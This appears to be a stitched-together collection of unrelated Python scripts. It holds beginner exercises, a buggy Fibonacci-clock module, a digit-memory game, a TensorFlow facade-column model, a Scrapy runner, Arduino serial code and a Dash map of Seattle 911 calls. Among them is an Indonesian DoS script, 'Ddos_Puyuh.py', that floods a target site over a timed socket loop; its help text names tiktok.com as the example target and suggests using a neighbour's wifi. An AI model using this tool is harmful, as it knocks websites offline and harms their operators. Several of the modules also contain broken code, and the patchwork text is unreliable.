                    name, self.type_name
                )
            )
        if not is_instance_of(data, data_type, can_be_str=can_be_str):
            raise TypeError(
                "Attribute '{}' of Entity '{}' expected to be of type '{}', got '{}'".format(
                    name, self.type_name, data_type, type(data)
                )
            )
        return data
|
#Part 1
for count in range(1, 1001, 2):
print count
#Part 2
for count in range(5, 1000001, 5):
print count
#Sum List
a = [1, 2, 5, 10, 255, 3]
sum = 0
for i in a:
sum+=i
print sum
#Average List
print sum/len(a) |
import json

# Look up the coordinates of the municipality "Imola" in italy_geo.json.
with open('italy_geo.json') as geo_file:
    data = json.load(geo_file)
for x in data:
    if x[u'comune'] != u'Imola':
        continue
    lat = float(x[u'lat'])
    lon = float(x[u'lng'])
    print(lat, lon)
    break
else:
    # Loop finished without a match.
    x = None
"""
TODO
"""
from typing import Iterator
from datetime import datetime
from math import frexp
from random import choice as random_choice
def init_fib_clock(fib_clock):
    """Attach Fibonacci-clock state and color constants to *fib_clock*."""
    fib_clock._previous_fifth_minute = -1
    # Panel colors for: minute-only, hour-only, both, neither.
    fib_clock._COLOR_MIN = '98e8fa'  # Light blue.
    fib_clock._COLOR_HOUR = 'faaa98'  # Lightish red.
    fib_clock._COLOR_BOTH = 'b7fa98'  # Light green.
    fib_clock._COLOR_NEITHER = 'dddddd'  # Light grey.
    # For each value 0..12, every 5-bit mask over the Fibonacci panels
    # (1, 1, 2, 3, 5) that sums to that value; one is chosen at random later.
    fib_clock._color_codes = (
        (0b00000,),
        (0b10000, 0b01000),
        (0b11000, 0b00100),
        (0b10100, 0b01100, 0b00010),
        (0b10010, 0b01010, 0b11100),
        (0b11010, 0b00110, 0b00001),
        (0b10110, 0b01110, 0b10001, 0b01001),
        (0b11110, 0b11001, 0b00101),
        (0b10101, 0b01101, 0b00011),
        (0b10011, 0b01011, 0b11101),
        (0b11011, 0b00111),
        (0b10111, 0b01111),
        (0b11111,),
    )
    fib_clock._colors = [fib_clock._COLOR_NEITHER] * 5
    # Two consecutive keys map to each panel color (0-1 -> panel 0, ... 8-9 -> panel 4).
    fib_clock.color_map = {key: fib_clock._colors[key // 2] for key in range(10)}
def update_fib_clock(fib_clock):
    """Refresh the clock's panel colors when the 5-minute bucket changes."""
    now = datetime.now()
    fifth_minute = now.minute // 5
    if fib_clock._previous_fifth_minute != fifth_minute:
        hour = now.hour
        # Fold the 24-hour clock onto the 1-12 dial.
        # NOTE(review): datetime.hour is 0-23, so `hour == 24` is unreachable.
        if hour == 24:
            hour = 0
        elif hour > 12:
            hour -= 12
        color_codes = fib_clock._color_codes
        # Pick one of the equivalent bitmask encodings at random.
        minute_codes = random_choice(color_codes[fifth_minute])
        hour_codes = random_choice(color_codes[hour])
        # NOTE(review): zip() over a single two-element list yields 1-tuples,
        # so this 2-name unpacking raises ValueError on the first iteration.
        # Presumably the intent was to iterate over the five bits of each
        # bitmask and color each panel individually — confirm and fix.
        for minute, hour in zip([minute_codes, hour_codes]):
            if minute and hour:
                fib_clock.panel_colors = fib_clock._COLOR_BOTH
            elif minute:
                fib_clock.panel_colors = fib_clock._COLOR_MIN
            elif hour:
                fib_clock.panel_colors = fib_clock._COLOR_HOUR
            else:
                fib_clock.panel_colors = fib_clock._COLOR_NEITHER
        fib_clock._previous_fifth_minute = fifth_minute
def fibs(count, current=0, later=1):
    """Yield *count* Fibonacci numbers starting from *current*, *later*."""
    a, b = current, later
    for _ in range(count):
        yield a
        a, b = b, a + b
def options(iterable, result):
    """Greedily decompose *result* over the parts of *iterable*.

    Yields one boolean per part (largest first): True when the part was
    subtracted from the running remainder, False otherwise.
    """
    remaining = result
    for part in sorted(iterable, reverse=True):
        take = remaining >= part
        if take:
            remaining -= part
        yield take
def code(value, iterable):
    """Yield a single None when *value* equals sum(iterable).

    Raises ValueError when *value* exceeds the sum; yields nothing when it
    is below the sum.
    """
    total = sum(iterable)
    if value > total:
        raise ValueError(f'value {value} is too high')
    if value == total:
        yield
        return
def options(iterable) -> Iterator[tuple]:
    """Yield code() tuples for every value from 0 up to sum(iterable).

    NOTE: this definition shadows the earlier two-argument options().
    """
    values = tuple(iterable)
    total = sum(values)
    for value in range(total + 1):
        yield tuple(code(value, values))
def fib_options(limit):
    """Yield option tuples over the first *limit* Fibonacci numbers (1, 1, ...).

    NOTE(review): this calls ``options(fibos, i)`` with two arguments, but the
    ``options`` in scope at module level (the later one-argument definition)
    accepts only an iterable — as written this raises TypeError on the first
    iteration. Presumably the earlier two-argument ``options`` was intended;
    confirm intent before fixing.
    """
    fibos = tuple(fibs(limit, 1, 1))
    for i in range(sum(fibos) + 1):
        yield tuple(options(fibos, i))
if __name__ == '__main__':
    # Demo: enumerate code() tuples over the first five Fibonacci numbers.
    print(list(options(fibs(5, 1))))
|
import random, time, sys, os, winsound
stream = sys.stdout  # NOTE(review): never used in the visible script.
level = int  # Placeholder only; overwritten below with the chosen round count.
answer = ""  # Player's typed sequence for the current round.
round = 0  # Rounds cleared so far (shadows the built-in round()).
turn = ""  # The full digit sequence the player must reproduce.
def clear():
    """Clear the terminal ('cls' on Windows, 'clear' elsewhere)."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
frequency = 1500  # Beep frequency in hertz.
duration = 100  # Default beep duration in milliseconds.
def beep(duration=100):
    """Play a tone at the module-level *frequency* for *duration* ms (Windows only)."""
    winsound.Beep(frequency, duration)
clear()
level = int(input("Selecione o número de fases >> "))
clear()
dif = int(input("Selecione a dificuldade [ 1 - FÁCIL ] // [ 2 - MÉDIO ] // [ 3 - DIFÍCIL ] // >> "))
# Map the menu choice to the per-digit display delay in seconds
# (easy = 2s, medium = 1s, hard = 0.5s).
if dif == 1:
    dif = 2
elif dif == 2:
    dif = 1
elif dif == 3:
    dif = .500
clear()
# Countdown before the game starts.
print("Começando em 3...")
beep()
time.sleep(1)
clear()
print("Começando em 3...2...")
beep()
time.sleep(1)
clear()
print("Começando em 3...2...1...")
beep()
time.sleep(1)
clear()
print("Começando em 3...2...1... JÁ!!")
beep(500)
time.sleep(1)
clear()
game = True  # NOTE(review): never read afterwards.
resultList = []  # One digit (as a string) per round, in order of appearance.
while round < level:
    answer = ""
    # Extend the sequence with a new random digit.
    n = random.randint(0,9)
    n2 = str(n)
    resultList.append(n2)  # Append the new digit to the displayed sequence.
    # Replay the whole sequence, one digit at a time.
    for x in range(len(resultList)):
        print("[[ " + resultList[x] + " ]]")
        beep()
        time.sleep(dif)
        clear()
    clear()
    answer = input(" >> >> >> ")
    turn += n2  # Expected answer: all digits concatenated so far.
    #print ("Gabarito: ", turn)
    #print("Input: ", ans)
    if answer == turn:
        round += 1
        clear()
    else:
        print("GAME OVER!!","Gabarito: {}".format(turn),"Input: {}".format(answer), sep='\n')
        quit()
print("PARABÉNS!!!","Gabarito: {}".format(turn),"Input: {}".format(answer), sep='\n')
# Victory fanfare: ten short beeps.
for i in range(10):
    beep(80)
import datetime
import os
from PIL import Image, ImageDraw
import numpy
import scipy.misc
import glob
import scipy
import random
import argparse
import cv2
import tensorflow as tf
from tensorflow.keras.callbacks import TensorBoard
HEIGHT = 160  # Network input height in pixels.
WIDTH = 160  # Network input width in pixels.
NUM_CHANNELS = 3  # RGB channels (grayscale is replicated across all three).
NUM_CLASSES = 2  # Two regression outputs: right and left column positions.
# Model file is named after this script, e.g. "<script>_model.h5".
MODEL_FILE_NAME = "{}_model.h5".format(os.path.splitext(os.path.basename(__file__))[0])
DEBUG_DIR = "__debug__"  # Where annotated debug images are written.
def augmentation(img, paramR, paramL):
    """Randomly shift-crop and slightly rotate *img*, adjusting the two
    horizontal annotations (expressed as fractions of image width) to match.

    :param img: image array of shape (height, width, channels)
    :param paramR: right column position in [0, 1]
    :param paramL: left column position in [0, 1]
    :return: (augmented image, adjusted paramR, adjusted paramL)
    """
    height, width, num_channels = img.shape
    # crop: pad by a fixed 4px margin, then take a random window of the
    # original size (the commented lines show an earlier 10% variant).
    #shift_h = int(width * 0.1)
    #shift_v = int(height * 0.1)
    shift_h = 4
    shift_v = 4
    offset_x = int(random.uniform(0, shift_h * 2))
    offset_y = int(random.uniform(0, shift_v * 2))
    img = tf.image.resize_with_crop_or_pad(img, height + shift_v * 2, width + shift_h * 2)
    img = img[offset_y:offset_y+height, offset_x:offset_x+width,:]
    # Translate the annotations by the same horizontal shift and clamp to [0, 1].
    paramR = (paramR * width + shift_h - offset_x) / width
    paramL = (paramL * width + shift_h - offset_x) / width
    paramR = numpy.clip(paramR, a_min = 0, a_max = 1)
    paramL = numpy.clip(paramL, a_min = 0, a_max = 1)
    # rotate by a small random angle (degrees, cubic interpolation).
    # NOTE(review): paramR/paramL are not adjusted for the rotation.
    angle = random.uniform(-0.1, 0.1)
    img = scipy.ndimage.rotate(img, angle , axes=(1, 0), reshape=False, order=3, mode='constant', cval=0.0, prefilter=True)
    return img, paramR, paramL
def standardize_img(img):
    """Normalize *img* to zero mean and unit variance over all pixels."""
    center = numpy.mean(img, axis=None, keepdims=True)
    spread = numpy.sqrt(numpy.mean((img - center) ** 2, axis=None, keepdims=True))
    return (img - center) / spread
def load_img(file_path):
    """Load an RGB image and collapse it to 3-channel luma grayscale floats."""
    pil_img = Image.open(file_path)
    pil_img.load()
    arr = numpy.asarray(pil_img, dtype="int32")
    # ITU-R BT.601 luma weights; the float result truncates into the int array.
    luma = 0.2989 * arr[:, :, 0] + 0.5870 * arr[:, :, 1] + 0.1140 * arr[:, :, 2]
    for channel in range(3):
        arr[:, :, channel] = luma
    return arr.astype("float")
def load_imgs(path_list, ground_params, floor_params, use_augmentation = False, augmentation_factor = 1, use_shuffle = False, debug = False):
    """Load facade images and their two column annotations into (X, Y) arrays.

    :param path_list: image file paths
    :param ground_params: {filename: [column positions in [0, 1]]}
    :param floor_params: {filename: [floor split positions in [0, 1]]}
    :param use_augmentation: when True, emit augmentation_factor variants per image
    :param use_shuffle: shuffle X and Y in unison before returning
    :param debug: write annotated copies of each sample to DEBUG_DIR
    :return: X of shape (N, WIDTH, HEIGHT, 3) standardized, Y of shape (N, 2)
    """
    # Calculate number of images
    if use_augmentation:
        num_images = len(path_list) * augmentation_factor
    else:
        num_images = len(path_list)
    X = numpy.zeros((num_images, WIDTH, HEIGHT, 3), dtype=float)
    Y = numpy.zeros((num_images, 2), dtype=float)
    # Load images
    i = 0
    for file_path in path_list:
        file_name = os.path.basename(file_path)
        orig_img = load_img(file_path)
        orig_height, orig_width, channels = orig_img.shape
        # Crop everything above the shop line (the highest floor annotation).
        floors = sorted(floor_params[file_name])
        shop = int(floors[len(floors) - 1] * orig_height)
        orig_img = orig_img[shop:orig_height,:,:]
        orig_height, orig_width, channels = orig_img.shape
        img = cv2.resize(orig_img, dsize=(WIDTH, HEIGHT), interpolation=cv2.INTER_CUBIC)
        # Largest value first: values[0] is the right column, values[1] the left.
        values = sorted(ground_params[file_name], reverse = True)
        width = orig_width
        #Previous loop location
        valueR = values[0]
        valueL = values[1]
        # NOTE(review): width == orig_width here, so these are identity
        # rescalings — presumably left over from an earlier per-crop loop.
        actual_valueR = valueR * orig_width / width
        actual_valueL = valueL * orig_width / width
        if use_augmentation:
            # Emit several randomly augmented variants of this image.
            for j in range(augmentation_factor):
                img_tmp, adjusted_valueR, adjusted_valueL = augmentation(img, actual_valueR, actual_valueL)
                if debug:
                    output_filename = "{}/{}.png".format(DEBUG_DIR, i)
                    print(output_filename)
                    output_img(img_tmp, adjusted_valueR, adjusted_valueL, output_filename)
                X[i,:,:,:] = standardize_img(img_tmp)
                Y[i, 0] = adjusted_valueR
                Y[i, 1] = adjusted_valueL
                i += 1
        else:
            if debug:
                output_filename = "{}/{}.png".format(DEBUG_DIR, i)
                print(output_filename)
                output_img(img, actual_valueR, actual_valueL, output_filename)
            X[i,:,:,:] = standardize_img(img)
            Y[i, 0] = actual_valueR
            Y[i, 1] = actual_valueL
            i += 1
    if use_shuffle:
        # Shuffle samples and labels with the same permutation.
        randomize = numpy.arange(len(X))
        numpy.random.shuffle(randomize)
        X = X[randomize]
        Y = Y[randomize]
    return X, Y
def output_img(img, valueR, valueL, filename):
    """Save *img* with two vertical yellow lines at the given width fractions."""
    canvas = Image.fromarray(img.astype(numpy.uint8))
    width, height = canvas.size
    draw = ImageDraw.Draw(canvas)
    for fraction in (valueR, valueL):
        x = width * fraction
        draw.line([(x, 0), (x, height)], fill="yellow", width=3)
    canvas.save(filename)
def output_img2(img, values, filename):
    """Draw vertical yellow lines for each (R, L) pair in *values* on a PIL image."""
    width, height = img.size
    draw = ImageDraw.Draw(img)
    for pair_start in range(0, len(values), 2):
        for fraction in (values[pair_start], values[pair_start + 1]):
            x = width * fraction
            draw.line([(x, 0), (x, height)], fill="yellow", width=3)
    img.save(filename)
def load_annotation(file_path):
    """Parse a column annotation file into {filename: [positions]}.

    File format, repeated per image until a blank/EOF line:
        <filename>
        <column count line (ignored)>
        <comma-separated column positions>

    Fix: the file handle was previously never closed; use a context manager.

    :param file_path: path to the annotation text file
    :return: dict mapping image file name to a list of float positions
    """
    ground_params = {}
    with open(file_path, "r") as file:
        while True:
            filename = file.readline().strip()
            if len(filename) == 0:
                break
            file.readline()  # Column-count line, unused.
            ground_columns = file.readline().strip()
            ground_params[filename] = [
                float(item.strip()) for item in ground_columns.split(',')
            ]
    return ground_params
def load_annotation_floor(file_path):
    """Parse a floor annotation file into {filename: [positions]}.

    File format, repeated per image until a blank/EOF line:
        <filename>
        <comma-separated floor positions>

    Fix: the file handle was previously never closed; use a context manager.

    :param file_path: path to the annotation text file
    :return: dict mapping image file name to a list of float positions
    """
    floor_params = {}
    with open(file_path, "r") as file:
        while True:
            filename = file.readline().strip()
            if len(filename) == 0:
                break
            floors = file.readline().strip()
            floor_params[filename] = [
                float(item.strip()) for item in floors.split(',')
            ]
    return floor_params
def build_model(int_shape, num_params, learning_rate):
    """Build and compile a VGG19-based regression network.

    :param int_shape: unused — the input shape is fixed to (WIDTH, HEIGHT, 3).
    :param num_params: number of regression outputs (width of the last layer)
    :param learning_rate: Adam learning rate
    :return: compiled tf.keras model (MSE loss, MAE/MSE metrics)
    """
    model = tf.keras.Sequential([
        # ImageNet-pretrained VGG19 backbone without its classifier head.
        tf.keras.applications.VGG19(input_shape=(WIDTH, HEIGHT, 3), include_top=False, weights='imagenet'),
        tf.keras.layers.Flatten(),
        # Two L2-regularized dense layers with dropout, then a linear output.
        tf.keras.layers.Dense(512, activation='relu', kernel_regularizer=tf.keras.regularizers.l2(0.001)),
        tf.keras.layers.Dropout(0.5),
        tf.keras.layers.Dense(512, activation='relu', kernel_regularizer=tf.keras.regularizers.l2(0.001)),
        tf.keras.layers.Dropout(0.5),
        tf.keras.layers.Dense(num_params),
    ])
    optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
    model.compile(
        loss='mse',
        optimizer=optimizer,
        metrics=['mae', 'mse'])
    return model
def train(input_dir, model_dir, num_epochs, learning_late, augmentation_factor, output_dir, debug):
    """Train the column-regression model on all JPGs in *input_dir*.

    :param learning_late: Adam learning rate (sic — typo kept for interface
        compatibility)
    :param debug: when True, only write debug images and return early
    """
    # Load parameters
    ground_params = load_annotation("column_annotation.txt")
    floor_params = load_annotation_floor("floor_annotation.txt")
    # Build the (augmented, shuffled) training tensors.
    path_list = glob.glob("{}/*.jpg".format(input_dir))
    X, Y = load_imgs(path_list, ground_params, floor_params, use_augmentation = True, augmentation_factor = augmentation_factor, use_shuffle = True, debug = debug)
    #print(X.shape)
    if debug: return
    # Build model
    model = build_model((HEIGHT, WIDTH, NUM_CHANNELS), NUM_CLASSES, learning_late)
    # Setup for Tensorboard (Windows-style path separators).
    log_dir="logs\\fit\\" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
    file_writer = tf.summary.create_file_writer(log_dir + "\\metrics")
    file_writer.set_as_default()
    tensorboard_callback = TensorBoard(
        log_dir=log_dir,
        update_freq='batch',
        histogram_freq=1)
    # Training model: 80/20 train/validation split.
    model.fit(X, Y,
        epochs=num_epochs,
        validation_split = 0.2,
        callbacks=[tensorboard_callback])
    # Save the model
    model.save("{}/{}".format(model_dir, MODEL_FILE_NAME))
def test(input_dir, model_dir, output_dir, debug):
    """Evaluate the saved model on all JPGs in *input_dir* and write
    per-image predictions and annotated images to *output_dir*.

    NOTE(review): several constructs below look suspicious and should be
    confirmed: model.predict(X) is called twice per image for the two
    outputs; the ``break`` when valueL < 0.05 aborts ALL remaining images,
    not just the current one; and ``accuracy += (correct / w)`` divides by
    zero when the prediction covers the full width (w == 0).
    """
    # Load parameters
    ground_params = load_annotation("column_annotation.txt")
    floor_params = load_annotation_floor("floor_annotation.txt")
    # Split the tensor into train and test dataset
    path_list = glob.glob("{}/*.jpg".format(input_dir))
    X, Y = load_imgs(path_list, ground_params, floor_params, debug = debug)
    if debug: return
    # Load the model
    model = tf.keras.models.load_model("{}/{}".format(model_dir, MODEL_FILE_NAME))
    # Evaluation
    model.evaluate(X, Y)
    # Prediction
    predictedY = model.predict(X).flatten()
    # Write the prediction to a file
    file = open("{}/prediction.txt".format(output_dir), "w")
    for i in range(len(path_list)):
        file_name = os.path.basename(path_list[i])
        file.write("{},{}\n".format(file_name, predictedY[i]))
    file.close()
    # Save the predicted images
    accuracy = 0
    accuracy2 = 0
    for i in range(len(path_list)):
        file_name = os.path.basename(path_list[i])
        print(path_list[i])
        orig_img = load_img(path_list[i])
        orig_height, orig_width, channels = orig_img.shape
        # Crop everything above the shop line, as done during training.
        floors = sorted(floor_params[file_name])
        shop = int(floors[len(floors) - 1] * orig_height)
        orig_img = orig_img[shop:orig_height,:,:]
        orig_height, orig_width, channels = orig_img.shape
        img = cv2.resize(orig_img, dsize=(WIDTH, HEIGHT), interpolation=cv2.INTER_CUBIC)
        width = orig_width
        Y = []
        # Per-image prediction of the right (index 0) and left (index 1) columns.
        X = numpy.zeros((1, WIDTH, HEIGHT, 3), dtype=float)
        X[0,:,:,:] = standardize_img(img)
        valueR = model.predict(X).flatten()[0]
        R = valueR * width
        valueR = numpy.clip(valueR * width / orig_width, a_min = 0, a_max = 1)
        valueL = model.predict(X).flatten()[1]
        L = valueL * width
        valueL = numpy.clip(valueL * width / orig_width, a_min = 0, a_max = 1)
        if valueL < 0.05: break
        Y.append(valueR)
        Y.append(valueL)
        # Per-pixel accuracy: columns [0, L) and (R, width) are "outside",
        # compared against the annotated ground-truth interval.
        w = 0;
        correct = 0;
        w2 = 0;
        correct2 = 0;
        R_truth = ground_params[file_name][1] * width
        L_truth = ground_params[file_name][0] * width
        correct3 = 0
        correct4 = 0
        for j in range(width):
            if (j < L or j > R):
                w += 1;
                if (j < L_truth or j > R_truth):
                    correct += 1
            else:
                w2 += 1;
                if (j > L_truth and j < R_truth):
                    correct2 += 1
            if (j < L_truth or j > R_truth):
                correct3 += 1
            if (j > L_truth and j < R_truth):
                correct4 += 1
        #print((1 - floors[len(floors) - 1]) * correct3 / width)
        #print((1 - floors[len(floors) - 1]) * correct4 / width)
        accuracy += (correct / w)
        if (w2 != 0):
            accuracy2 += (correct2 / w2)
        # Save prediction image
        file_name = "{}/{}".format(output_dir, os.path.basename(path_list[i]))
        output_img2(Image.open(path_list[i]), Y, file_name)
    #print(accuracy / len(path_list))
    #print(accuracy2 / len(path_list))
def main():
    """Command-line entry point: parse arguments, prepare the output,
    model and (optionally) debug directories, then dispatch to the
    train or test routine."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--mode', required=True, choices=["train", "test"])
    arg_parser.add_argument('--input_dir', required=True, help="path to folder containing images")
    arg_parser.add_argument('--output_dir', default="out", help="where to put output files")
    arg_parser.add_argument('--model_dir', default="models", help="path to folder containing models")
    arg_parser.add_argument('--num_epochs', type=int, default=10)
    arg_parser.add_argument('--learning_rate', type=float, default=0.0001)
    arg_parser.add_argument('--augmentation_factor', type=int, default=100)
    arg_parser.add_argument('--debug', action="store_true", help="Output debug information")
    args = arg_parser.parse_args()
    # Make sure the output and model directories exist.
    for directory in (args.output_dir, args.model_dir):
        if not os.path.isdir(directory):
            os.mkdir(directory)
    # Create the debug directory, or empty it if it already exists.
    if args.debug:
        if os.path.isdir(DEBUG_DIR):
            for leftover in glob.glob("{}/*".format(DEBUG_DIR)):
                os.remove(leftover)
        else:
            os.mkdir(DEBUG_DIR)
    if args.mode == "train":
        train(args.input_dir, args.model_dir, args.num_epochs, args.learning_rate, args.augmentation_factor, args.output_dir, args.debug)
    elif args.mode == "test":
        test(args.input_dir, args.model_dir, args.output_dir, args.debug)
    else:
        # Unreachable in practice: argparse enforces choices=["train", "test"].
        print("Invalid mode is specified {}".format(args.mode))
        exit(1)
# Script entry point.
if __name__== "__main__":
    main()
|
import socket
import time
import sys
import os
import random
import string
import optparse
import requests
def help():
os.system("clear")
print("""
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mCoding Tools By \033[1;91m: \033[1;93mRendi Noober
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mGithub \033[1;91m : \033[1;93mhttps://github.com/Rendi-ID
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mFacebook\033[1;91m :\033[1;93m Rendi Saputra
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mYouTube\033[1;91m : \033[1;93mRendi Noober
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mJenis Tools \033[1;91m :\033[1;93m Attack
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mWhastApp\033[1;91m :\033[1;93m +62 899-8941-414
\033[1;93mNOTE\033[1;90m: \033[1;92mPembuat tools ini tidak akan bertanggung jawab atas apa
yang di lakukan oleh si pengguna baik itu sengaja maupun
tidak sengaja!!!
\033[1;96mSARAN\033[1;90m:
\033[1;93m KUOTA\033[1;90m:
\033[1;95m Jika anda menggunakan tools ini dengan kuota/peket data
saya sarankan untuk mempunyai kuota yg banyak (KALAU)
anda menggunakan tools ini secara lama
\033[1;93m WIFI\033[1;90m:
\033[1;95m Kalau anda menggunakan akses wifi saya sarankan untuk
memakai wifi tetangga atau wifi berbayar(3000)
di karenakan serangan Dos/DDos itu mengirim paket
dengan data yg banyak, maka dari itu kuota juga terkuras
\t\033[1;90m< \033[1;91mKETERANGAN TENTANG TOOLS INI \033[1;90m>
\033[1;92mTools ini di buat untuk pembelajaran, untuk membuat anda
mengerti dan paham bagaana cara melakukan Dos/DDos ke sebuah
website server
\t\033[1;90m<\033[1;91m FUNGSI \033[1;90m>
\033[1;92mUntuk melakukan serangan Dos/DDos ke sebuah website server
untuk melumpuhkan website dengan Cara mengirim data secara
berlebihan berbasis GB
\t\033[1;90m<\033[1;91m CARA MEMAKAI \033[1;90m>
\033[1;95mKetik di termux\033[1;90m:
\033[1;96mpython3 Ddos_Puyuh.py -t (link web) -p (port untuk koneksikan ke web) -m (jam serangan di mulai) -s (jam serangan selesai)
\033[1;92mcontoh\033[1;90m:
\033[1;96mpython3 Ddos_Puyuh.py -t https://tiktok.com -p 80 -m 23 -s 24 --message We are legion
\033[1;93m-t\033[1;90m =\033[1;92m Untuk meng-koneksikan ke website server yang di tuju
\033[1;93m-p\033[1;90m =\033[1;92m untuk meng-koneksikan port ke website target
\033[1;93m-m \033[1;90m=\033[1;92m jam serangan di mulai (sesuaikan dengan perangkat anda)
\033[1;93m-s\033[1;90m =\033[1;92m jam serangan di hentikan (sesuaikan dengan perangkat anda)
\033[1;95mok selamat mencoba \033[1;91m:\033[1;90m)
""")
if len(sys.argv) == 1:
help()
exit()
try:
run = requests.post("https://google.com")
opt = optparse.OptionParser(add_help_option=False)
opt.add_option("-t", dest="host")
opt.add_option("-p", dest="port")
opt.add_option("-m", dest="mulai")
opt.add_option("-s", dest="selesai")
opt.add_option("--message", dest="msg")
opts, args = opt.parse_args()
host = opts.host
port = opts.port
mulai = opts.mulai
selesai = opts.selesai
if opts.msg is None:
message = string.punctuation + string.digits + string.ascii_letters + string.ascii_lowercase + string.ascii_uppercase
msg = "".join(random.sample(message, 10))
elif opts.msg is not None:
msg = opts.msg
else:
pass
host = str(host).replace("https://", "").replace("http://", "").replace("www.", "")
try:
ip = socket.gethostbyname(host)
except socket.gaierror as e:
print("\033[1;90m[\033[1;96m!\033[1;90m]\033[1;91m Pastikan anda memasukan website yang benar!!")
exit()
# Time Bomb
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
waktu = time.strftime("%H")
if str(waktu) == str(mulai):
try:
print("\033[1;96mMengirim Paket Ke\033[1;91m " + host + "\033[1;92m Port\033[1;91m " + port + " \033[1;95mmulai\033[1;91m " + mulai + "\033[1;94m selesai \033[1;91m " + selesai)
sock.connect((str(ip), int(port)))
if port == 80:
sock.send("GET / \nHTTP /1.1\n User-Agent: {}\n\r".format("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36").encode())
sock.send(str(msg).encode("utf-8"))
except:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif str(waktu) == str(selesai):
print("\n\033[1;90m[\033[1;95m!\033[1;90m] \033[1;91mWaktu selesai, menutup serangan!!!")
time.sleep(1.0)
sock.close()
break
except requests.exceptions.ConnectionError:
print("\033[1;90m[\033[1;95m!\033[1;90m]\033[1;91m Cek koneksi")
exit()
|
# -*- coding: utf-8 -*-
# importing required packages
import logging
# import scrapy packages
import scrapy
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
# importing scrapy spiders
from spiders.crawler_v1 import crawler_v1
# main function
def main():
    """Configure logging and run the crawler_v1 spider to completion.

    ``CrawlerProcess.start()`` blocks until every scheduled crawl has
    finished, so the log line after it marks the end of the whole run.
    """
    # BUG FIX: the original format string "%(asctime)s%(levelname)s:%(message)s"
    # had no separator between the timestamp and the level, producing
    # garbled log lines such as "2021-01-01 00:00:00,000DEBUG:...".
    logging.basicConfig(filename="main.log", filemode="w",
                        format="%(asctime)s %(levelname)s:%(message)s",
                        level=logging.DEBUG)
    # Build the crawler process from the project's settings.py configuration.
    process = CrawlerProcess(get_project_settings())
    # running first crawler
    process.crawl(crawler_v1)
    process.start()  # blocking: returns once the crawl is done
    logging.info("crawler_v1 finished crawling")
    process.stop()
# Run the crawler when executed as a script.
if __name__=='__main__':
    main()
|
# encoding: utf-8
'''
@author: 程哲
@contact: 909991719@qq.com
@file: arduino通信.py
@time: 2017/9/28 10:55
'''
import serial
# Open the Arduino link on COM8 at 9600 baud with a 1 s read timeout.
port = serial.Serial("com8", 9600)
port.timeout = 1
# Echo the first line the board sends, write a probe, print the reply.
print(port.readline())
port.write(b'11111\n')
print(port.readline().decode("ascii"))
port.close()
# -*- coding: utf-8 -*-
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import pandas as pd
import plotly.express as px
import numpy as np
"""
This section import the csv 911 calls.
Year, Month, Zone columns are created.
Four most important types are filtered.
"""
file1 = "Seattle_Real_Time_Fire_911_Calls.csv"
data = pd.read_csv(file1, nrows=100000)  # nrows caps how many records are read
# Add "Year" and "Month" columns derived from the call timestamp
data['Year'] = pd.DatetimeIndex(data['Datetime']).year
year2019 = data['Year'] == 2019
#data=data[year2019] # in this demo only 2019 data are selected
data['Month'] = pd.DatetimeIndex(data['Datetime']).month
available_indicators = data['Year'].unique()
# Seattle city-center coordinates, used to split the map into quadrants
lat_mean = 47.608013
lon_mean = -122.335167
# Add Zone column: NE/NW/SE/SW quadrant relative to the city center
conditions = [
    (data['Longitude'] >= lon_mean) & (data['Latitude'] >= lat_mean),
    (data['Longitude'] < lon_mean) & (data['Latitude'] >= lat_mean),
    (data['Longitude'] >= lon_mean) & (data['Latitude'] < lat_mean),
    (data['Longitude'] < lon_mean) & (data['Latitude'] < lat_mean)]
choices = ['NE', 'NW', 'SE', 'SW']
data['Zone'] = np.select(conditions, choices)
# Keep only the four most frequent call types
medic = (data['Type'] == "Medic Response")
aid = data['Type'] == "Aid Response"
car = data['Type'] == "MVI - Motor Vehicle Incident"
fire = data['Type'] == "Auto Fire Alarm"
df=data[(medic | aid | fire | car)]
# Drop rows where np.select fell through to its default '0'
# (no quadrant matched, e.g. missing coordinates)
df = df[(df['Zone'] == 'NE')|(df['Zone'] == 'NW')|(df['Zone'] == 'SE')|(df['Zone'] == 'SW')]
"""
Interactive map section
Define the layout and callback functions
"""
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
# Page layout: map graph plus controls, rendered in two CSS columns.
app.layout = html.Div([
    dcc.Graph(id='map-graph'),
    html.Label('Year'),
    dcc.Dropdown(
        id='year-option',
        options=[{'label': i, 'value': i} for i in available_indicators],
        value=2019
    ),
    html.Label('Month'),
    # One slider stop per month present in the data (step=None snaps to marks).
    dcc.Slider(
        id = 'month-slider',
        min = df['Month'].min(),
        max = df['Month'].max(),
        value = df['Month'].min(),
        marks = {str(Month): str(Month) for Month in df['Month'].unique()},
        step=None),
    html.Label('Zone'),
    dcc.RadioItems(
        id = 'zone-option',
        options=[
            {'label': 'NE', 'value': 'NE'},
            {'label': 'NW', 'value': 'NW'},
            {'label': 'SE', 'value': 'SE'},
            {'label': 'SW', 'value': 'SW'}
        ],
        value='NE'
    ),
    html.Label('Call Type'),
    dcc.RadioItems(
        id = 'type-option',
        options=[
            {'label': 'Medic Response', 'value': 'Medic Response'},
            {'label': 'MVI - Motor Vehicle Incident', 'value': 'MVI - Motor Vehicle Incident'},
            {'label': 'Auto Fire Alarm', 'value': 'Auto Fire Alarm'},
            {'label': 'Aid Response', 'value': 'Aid Response'}
        ],
        value='Medic Response'
    ),
    # Secondary figure: per-zone call counts for the current selection.
    html.Div([
        dcc.Graph(
            id='statistics',
        )
    ], style={'width': '49%', 'display': 'inline-block'}),
],style={'columnCount': 2})
